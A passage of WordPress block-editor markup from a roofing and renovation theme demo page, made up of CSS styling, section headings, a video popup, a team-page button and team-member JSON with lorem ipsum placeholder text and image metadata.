976px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-67a82438-88af-4556-ac9e-4c3da247e0cf\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We’re Providing Premium<br>Roofing Services</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/video-popup {\"videoLink\":\"https://www.youtube.com/embed/7er8Dz9JaO0\",\"vidheight\":300,\"opacity\":0,\"counterId\":\"72cbdd00-2b42-4deb-a7fd-0c19210e65bf\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: 300px; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n</style><div class=\"skt-blocks-block-72cbdd00-2b42-4deb-a7fd-0c19210e65bf skt-blocks-video-popup alignundefined\"><div class=\"skt-blocks-video-popup__wrapper\" data-video=\"7er8Dz9JaO0\" style=\"border-width:1px;border-style:none;box-shadow:0px 0px   undefined \"><a href=\"#\" class=\"skt-blocks-video-popup__overlay\"></a><span class=\"skt-blocks-video-popup__play-button\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"30\" height=\"30\" viewBox=\"0 0 256 320\" style=\"width:30px;height:30px;fill:#ffffff;opacity:1\"><path d=\"M0 0v320l256-160L0 0z\"></path></svg></span></div></div>\n<!-- /wp:skt-blocks/video-popup --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ce6cb053-1ec8-4c04-85db-13a427505324\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-7\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-7 skt-blocks-block-section-outer-wrap block-ce6cb053-1ec8-4c04-85db-13a427505324 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ce6cb053-1ec8-4c04-85db-13a427505324.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ce6cb053-1ec8-4c04-85db-13a427505324.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ce6cb053-1ec8-4c04-85db-13a427505324.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ce6cb053-1ec8-4c04-85db-13a427505324 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ce6cb053-1ec8-4c04-85db-13a427505324.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"9f4663ea-a5db-40fc-b1cc-f21b84eb8759\"} -->\n<style type=\"text/css\"> .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-9f4663ea-a5db-40fc-b1cc-f21b84eb8759 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingTablet\":30,\"blockId\":\"91d4b807-310e-4d33-9c09-5410cb4f7c01\"} -->\n<style type=\"text/css\"> .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-91d4b807-310e-4d33-9c09-5410cb4f7c01 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-91d4b807-310e-4d33-9c09-5410cb4f7c01\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"3e5aea8b-fe31-4b4a-a2cf-81d0e9007662\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":17,\"headingTitleFontSizeTablet\":17,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-3e5aea8b-fe31-4b4a-a2cf-81d0e9007662\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Leaderships</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Meet Awesome<br>Experts</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"7b681c73-1c40-4bb3-af82-2e7717982562\"} -->\n<style type=\"text/css\"> .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7b681c73-1c40-4bb3-af82-2e7717982562 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7b681c73-1c40-4bb3-af82-2e7717982562\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All Team Member\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\",\"counterId\":\"3ae9a34b-e7e2-43ff-99a6-51ffbdeca952\",\"vPadding\":20,\"hPadding\":30,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#ff5e14\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":17,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"500\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 20px; padding-bottom: 20px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 30px; padding-right: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 17px; font-family: Poppins; font-weight: 500; line-height: undefined; opacity: 1; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #ff5e14; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 17px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-3ae9a34b-e7e2-43ff-99a6-51ffbdeca952 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\" rel=\"noopener noreferrer\" target=\"_blank\">View All Team Member</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/team {\"teamBlock\":[{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 